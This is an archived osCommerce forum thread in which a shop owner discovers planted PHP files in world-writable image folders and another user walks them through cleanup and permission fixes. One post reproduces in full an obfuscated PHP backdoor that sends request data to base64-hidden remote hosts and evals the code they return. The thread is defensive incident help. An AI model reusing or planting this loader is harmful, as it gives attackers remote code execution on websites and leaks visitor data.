Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Wierd Problem a page from no where...


saduneni

Recommended Posts

Please take a look at this link, it came from nowhere

 

http://www.girlzwholesale.com/catalog/imag...eb256204e2.html

 

the directory /sierra doesnt even exist! i need help this is a new setup and i have limited help from my host, (www.websitesource.com) they suggested me to open a ticket in oscommerce. i though there are "master minds" over here so i am trying.. thanks in advance

Link to comment
Share on other sites

You've been hacked because the permissions on your /catalog/images folder are at 777

 

Look at these files:

 

/catalog/images/71512.php

 

/catalog/images/banners/52488.php

 

/catalog/images/default/142853.php

 

/catalog/images/dvd/76321.php

 

/catalog/images/gt_interactive/137999.php

 

/catalog/images/hewlett_packard/141102.php

 

/catalog/images/icons/16755.php

 

/catalog/images/infobox/175095.php

 

/catalog/images/mail/211443.php

 

/catalog/images/matrox/130494.php

 

/catalog/images/microsoft/205609.php

 

I think you'll find them all bogus.

 

This one looks very suspicious to me:

 

/catalog/images/fsys2.php

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I have checked the code and i did not find any thing important, its all looks fishy and code on all the pages (as mentioned by germ) are similar as one one in fsys2.php as below: is this code for anyone that belongs to oscommerce? and if yes why its in image folder?

 

<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($B).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5yc3NuZXdzLndz")."/?".$str))){} else if (include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My54bWxkYXRhLmluZm8=")."/?".$str));else if ($c=file_get_contents(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcucnNzbmV3cy53cy8/").$str);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$str=curl_exec($cu);curl_close($cu);eval($str);}; ?>

Link to comment
Share on other sites

Trust me, all those files are BAD.

 

I know because the same thing happened to me last month.

:blush:

There may be BAD files in your admin now, too.

 

I can't see those.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

The first thing you must do is change the permissions on the /catalog/images folder to 755

 

The same with all the folders inside the /catalog/images folder.

 

Then delete the bad files.

 

Then change the permissions on all the files in the /catalog/images folder to 644

 

Then check your /admin/backups folder for bad files.

 

And probably /admin/images folder.

 

You've been hacked for over a month.

 

The timestamp on most of the bad files is:

 

10-Mar-2008 16:39

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Hi jim, i am keep on checking all the files in admin and other areas, so far i did not find any file. but what i did is i have removed fsys2.php(deleted) it look non of the catalog part is effected, i am going to back up and remove all the unwanted files, but my question is can i change permission to this folder, pls check the screen shot, i think its 666 {hope i am right} please need advice,

abc.gif

Link to comment
Share on other sites

sorry overlooked, i am going to try and see

 

thanks

 

Hi jim, i am keep on checking all the files in admin and other areas, so far i did not find any file. but what i did is i have removed fsys2.php(deleted) it look non of the catalog part is effected, i am going to back up and remove all the unwanted files, but my question is can i change permission to this folder, pls check the screen shot, i think its 666 {hope i am right} please need advice,

abc.gif

Link to comment
Share on other sites

The permissions need to be 755

 

Check all the boxes for USER

 

Then for GROUP and OTHER, the READ and EXEC boxes ONLY!

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

:thumbsup: thanks, i have done every thing as per your instruction, my shop is in good shape. i have checked all the files in admin but i did not find any goofy files, am i misssing something? like hidden files. i cannot see! and what about database? there could be any potential risk involved? thanks again

 

sorry overlooked, i am going to try and see

 

thanks

Link to comment
Share on other sites

There weren't any hidden files in mine.

 

If you got all the bad files, changed the permissions like I said, and checked the admin, then you should be OK now.

 

Just keep a close eye on it for a while.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

sure, thanks jim, thanks for your help

 

There weren't any hidden files in mine.

 

If you got all the bad files, changed the permissions like I said, and checked the admin, then you should be OK now.

 

Just keep a close eye on it for a while.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...